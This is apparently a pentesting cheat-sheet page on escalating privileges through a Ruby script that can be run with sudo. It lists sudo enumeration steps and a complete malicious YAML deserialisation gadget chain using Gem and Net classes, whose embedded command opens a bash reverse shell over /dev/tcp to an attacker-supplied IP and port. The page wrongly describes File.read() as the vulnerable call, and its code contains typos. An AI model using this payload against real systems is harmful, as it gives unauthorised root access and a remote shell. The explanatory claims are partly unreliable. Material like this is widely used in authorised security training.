# Ruby

## Theory

Ruby scripting is a powerful tool used by system administrators and developers to automate tasks and streamline processes on Unix-like systems. However, like any software, ruby scripts can be vulnerable to various security issues, which, if exploited, can lead to privilege escalation and unauthorized access.

## Practice

### YAML Code Execution

{% tabs %}
{% tab title="Enumerate" %}
Assume the ruby script can be executed as root with sudo rights. If it use the `File.read()` method and we controll its input, then the script is vulnerable to arbitrary code execution.

```bash
sudo -l
    (root): /usr/bin/ruby sample.rb
```

Check if we have control over the input of the vulnerable function

```ruby
File.read(’sample.yml’)
```

{% endtab %}

{% tab title="Exploit" %}
If we controll some variables passed to this vulnerables functions, we can inject arbitrary code. here is an example of a malicious `sammple.yml` file passed to the `File.read()` function:

```yaml
---
- !ruby/object:Gem::Installer
    i: x
- !ruby/object:Gem::SpecFetcher
    i: y
- !ruby/object:Gem::Requirement
  requirements:
    !ruby/object:Gem::Package::TarReader
    io: &1 !ruby/object:Net::BufferedIO
      io: &1 !ruby/object:Gem::Package::TarReader::Entry
         read: 0
         header: "abc"
      debug_output: &1 !ruby/object:Net::WriteAdapter
         socket: &1 !ruby/object:Gem::RequestSet
             sets: !ruby/object:Net::WriteAdapter
                 socket: !ruby/module 'Kernel'
                 method_id: :system
             git_set: "bash -c 'bash -i >& /dev/tcp/<local-ip>/<local-port> 0>&1'"
         method_id: :resolve

```

{% endtab %}
{% endtabs %}

## References

{% embed url="<https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/ruby-privilege-escalation/>" %}